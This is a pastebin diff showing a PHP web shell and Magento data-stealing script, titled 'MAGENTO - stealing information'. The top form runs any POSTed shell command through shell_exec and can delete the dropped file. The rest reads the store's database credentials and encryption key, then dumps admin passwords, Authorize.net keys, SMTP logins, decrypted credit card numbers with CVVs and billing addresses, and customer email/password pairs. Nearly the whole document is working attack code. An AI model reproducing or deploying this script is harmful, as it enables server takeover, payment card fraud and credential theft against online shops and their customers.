View difference between Paste ID: <a href="/R8J0N3cr">R8J0N3cr</a> and <a href="/j8VW0xgZ">j8VW0xgZ</a>

<center>
1		<center>
2		<form method="post">
3		<input type="hidden" name="cmd" value="rm qq.php">
4		<input type="submit" value="Delete">
5		</form>
6		<?php
7		$fw = "fwrite";
8		$ada = "function_exists";
9		$crot = "shell_exec";
10		if (isset($_POST['cmd'])) {
11		$fw($mulai, $buat);
12		if ($ada('shell_exec')) {
13		$lihat = $_POST['cmd'];
14		$hasil = $crot("$lihat");
15		echo "<pre>$hasil</pre>";
16		}
17		}
18		?>
19		<?php
20		/*
21		coder : sohai
22		*/
23
24		@set_time_limit(0);
25
26		echo'<head>
27		<title>MAGENTO - stealing information</title>
28		</head>
29		<div id="page-wrap">
30		<body>
31		<style type="text/css">
32		body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; }
33		table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
34		td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
35		A:Link, A:Visited { color: #999999; text-decoration: none; }
36		A.no:Link, A.no:Visited { text-decoration: none; }
37		A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
38		input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
39		textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
40		.fleft { float:left;text-align:left; }
41		.fright { float:right;text-align:right; }
42		#pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
43		#pagebar td { vertical-align:top; }
44		#pagebar p { font:8pt tahoma;}
45		#pagebar a { font-weight:bold;color:#666666; }
46		#pagebar a:visited { color:#00CE00; }
47		#mainmenu { text-align:center; }
48		#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
49		#maininfo,.barheader,.barheader2 { text-align:center; }
50		#maininfo td { padding:3px; }
51		.barheader { font-weight:bold;padding:5px; }
52		.barheader2 { padding:5px;border:2px solid #333333; }
53		.contents,.explorer { border-collapse:collapse;}
54		.contents td { vertical-align:top; }
55		.mainpanel { border-collapse:collapse;padding:5px; }
56		.barheader,.mainpanel table,td { border:1px solid #333333; }
57		.mainpanel input,select,option { border:1px solid #333333;margin:0; }
58		input[type="submit"] { border:1px solid #333333; }
59		input[type="text"] { padding:3px;}
60		.fxerrmsg { color:red; font-weight:bold; }
61		#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
62		#pagebar,.mainpanel,input[type="submit"] { background-color:black; }
63		.barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
64		textarea,.mainpanel input,select,option { background-color:#000000; }
65		// -->
66		</style>
67
68		<body bgcolor="#ffffff" >
69
70		<center>
71		<br>
72		<FORM action="" method="post">
73		<div align="center">[M A G E N T O] - Stealing Information<br>
74		<div align="center">coder: sohai & n4KuLa_<br>
75		<input type="hidden" name="form_action" value="2">
76		</div>
77		</div>
78		';
79
80
81		if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
82		$xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
83		if(isset($xml->global->resources->default_setup->connection)) {
84		$connection = $xml->global->resources->default_setup->connection;
85		$prefix = $xml->global->resources->db->table_prefix;
86		$key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
87		require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
88
89		try {
90		$app = Mage::app('default');
91		Mage::getSingleton('core/session', array('name'=>'frontend'));
92		}catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
93
94		if (!mysql_connect($connection->host, $connection->username, $connection->password)){
95		print("Could not connect: " . mysql_error());
96		}
97		mysql_select_db($connection->dbname);
98		echo $connection->host."\|".$connection->username."\|".$connection->password."\|".$connection->dbname."\| $prefix \| $key<br/>\n";
99
100		$crypto = new Varien_Crypt_Mcrypt();
101		$crypto->init($key);
102
103		//=========================================================================================================
104		$query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
105		if (!$query){
106		echo "<center><b>Gagal</b></center>";
107		}else{
108		$site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
109		echo'<br><br>
110		====================================================================<br>
111		[ Admin FROM website : '.$site['website'].'] <br>
112		====================================================================<br>';
113		}
114		echo "
115		<table border='1' align='center' >
116		<tr>
117		<td>id</td>
118		<td>firstname</td>
119		<td>lastname</td>
120		<td>email</td>
121		<td>username</td>
122		<td>password</td>
123		</tr>";
124		while($vx = mysql_fetch_array($query)) {
125		$no = 1;
126		$user_id = $vx['user_id'];
127		$username = $vx['username'];
128		$password = $vx['password'];
129		$email = $vx['email'];
130		$firstname = $vx['firstname'];
131		$lastname = $vx['lastname'];
132		echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
133		}
134		echo "</table><br>";
135		//=========================================================================================================
136		$query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
137		if(mysql_num_rows($query) != 0){
138		if (!$query){
139		echo "<center><b>Gagal</b></center>";
140		}else{
141		echo'<br><br>
142		====================================================================<br>
143		[ Authorizenet ] <br>
144		====================================================================<br>';
145		}
146		echo "
147		<table border='1' align='center' >
148		<tr>
149		<td>user</td>
150		<td>pass</td>
151		</tr>";
152		$no = 1;
153		while($vx = mysql_fetch_array($query)) {
154		$user = $crypto->decrypt($vx['user']);
155		$pass = $crypto->decrypt($vx['pass']);
156
157
158		echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
159		$no++;
160		}
161		echo "</table><br>";
162		}
163		//=========================================================================================================
164		$query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
165		if(mysql_num_rows($query_smtp) != 0){
166		if (!$query_smtp){
167		echo "<center><b>Gagal</b></center>";
168		}else{
169		echo'<br><br>
170		====================================================================<br>
171		[ SMTP ] <br>
172		====================================================================<br>';
173		}
174		echo "
175		<table border='1' align='center' >
176		<tr>
177		<td>no</td>
178		<td>host</td>
179		<td>port</td>
180		<td>user</td>
181		<td>pass</td>
182		</tr>";
183		$no = 1;
184		$batas = 0;
185		while($rows = mysql_fetch_array($query_smtp)) {
186		$smtphost = $rows[0];
187		$smtpport = $rows[1];
188		$smtpuser = $rows[2];
189		$smtppass = $rows[3];
190		echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
191		$no++;
192		}
193		echo "</table><br>";
194		}
195		//=========================================================================================================
196		$query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' \|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' \| ',billing.lastname,' \| ',billing.street,' \| ',billing.city,' \| ', billing.region,' \| ',billing.postcode,' \| ',billing.country_id,' \| ',billing.telephone,' \|-\| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
197		$query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'\|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' \| ',billing.lastname,' \| ',billing.street,' \| ',billing.city,' \| ', billing.region,' \| ',billing.postcode,' \| ',billing.country_id,' \| ',billing.telephone,' \| ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
198		if(mysql_num_rows($query) != 0 \|\| mysql_num_rows($query2) != 0){
199		echo'<br><br>
200		====================================================================<br>
201		[ 16 Digit ] <br>
202		====================================================================<br>';
203		echo "
204		<table border='1' align='left' >
205		<tr>
206		<td>no</td>
207		<td>Date</td>
208		<td>Credit Owner</td>
209		<td>method</td>
210		<td>Credit Number</td>
211		<td>Credit Exp</td>
212		<td>CVV</td>
213		<td>Address</td>
214		</tr>";
215		$no = 1;
216		$batas = 0;
217		while($vx = mysql_fetch_array($query)){
218		$date = $vx['updated_at'];
219		$cc_owner = $vx['cc_owner'];
220		$method = $vx['method'];
221		$cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
222		$exp = $vx['exp'];
223		$cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
224		$Billing_Address = $vx['Billing Address'];
225		echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
226		$batas = $no++;
227		}
228
229		while($vx2 = mysql_fetch_array($query2)){
230		$batas +=1;
231		$cc_owner = $vx2['cc_owner'];
232		$method = $vx2['method'];
233		$cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
234		$exp = $vx2['exp'];
235		$cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
236		$Billing_Address = $vx2['Billing Address'];
237		echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
238		$batas++;
239		}
240
241		echo "</table><br>";
242		}
243		//=========================================================================================================
244		$query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
245		$query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
246
247
248		if(mysql_num_rows($query) != 0 \|\| mysql_num_rows($query2) != 0 ){
249		if (!$query){
250		echo "<center><b>Gagal</b></center>";
251		}else{
252		echo'<br><br>
253		====================================================================<br>
254		[ PayPal User + Pass ] <br>
255		====================================================================<br>';
256		}
257		echo "
258		<table border='1' align='center' >
259		<center>
260		<tr>
261		<td>no</td>
262		<td>user</td>
263		<td>pass</td>
264		</tr>";
265		$no = 1;
266		$batas = 0;
267		while($vx = mysql_fetch_array($query)) {
268		$user = $vx['email'];
269		$pass = $vx['value'];
270		echo "<tr><pre><td>$user\|$pass</td></pre></tr>";
271		$batas = $no++;
272		}
273
274		if(mysql_num_rows($query2) != 0 && ($query2)){
275		while($vx2 = mysql_fetch_array($query2)){
276		$user = $vx2['customer_email'];
277		$pass = $crypto->decrypt($vx2['password_hash']);
278		if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
279		$batas +=1;
280		echo "<tr><pre><td>$user\|$pass</td></pre></tr>";
281		$batas++;
282		}
283		}
284		}
285
286		echo "</table><br>";
287		}
288		//=========================================================================================================
289		}
290		}
291		function save($format,$data){
292		$fp = fopen($format, 'a');
293		fwrite($fp, $data);
294		fclose($fp);
295		}
296		function cekbase64($string){
297		$decoded = base64_decode($string, true);
298		if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
299		if(!base64_decode($string, true)) return false;
300		if(base64_encode($decoded) != $string) return false;
301		return true;//nilai return 1 jika true
302		}
303		//----untuk decode password ---/
304		class Varien_Crypt_Mcrypt{
305		/**
306		* Constuctor
307		*
308		* @param array $data
309		*/
310		public function __construct()
311		{
312		}
313
314		/**
315		* Initialize mcrypt module
316		*
317		* @param string $key cipher private key
318		* @return Varien_Crypt_Mcrypt
319		*/
320		public function init($key)
321		{
322		$this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
323		$iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
324		$maxKeySize = mcrypt_enc_get_key_size($this->handler);
325
326		if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
327		//throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
328		return null;
329		}
330
331		mcrypt_generic_init($this->handler, $key, $iv);
332
333		return $this;
334		}
335
336		/**
337		* Encrypt data
338		*
339		* @param string $data source string
340		* @return string
341		*/
342		public function encrypt($data)
343		{
344		if (!$this->handler) {
345		//throw new Varien_Exception('Crypt module is not initialized.');
346		return null;
347		}
348		if (strlen($data) == 0) {
349		return $data;
350		}
351		return base64_encode(mcrypt_generic($this->handler, $data));
352		}
353
354		/**
355		* Decrypt data
356		*
357		* @param string $data encrypted string
358		* @return string
359		*/
360		public function decrypt($data)
361		{
362		if (!$this->handler) {
363		//throw new Varien_Exception('Crypt module is not initialized.');
364		return null;
365		}
366		if (strlen($data) == 0) {
367		return $data;
368		}
369		return mdecrypt_generic($this->handler, base64_decode($data));
370		}
371
372
373		/**
374		* Desctruct cipher module
375		*
376		*/
377		public function __destruct()
378		{
379		if ($this->handler) {
380		$this->_reset();
381		}
382		}
383
384		protected function _reset()
385		{
386		mcrypt_generic_deinit($this->handler);
387		mcrypt_module_close($this->handler);
388		}
389		}
390
391		?>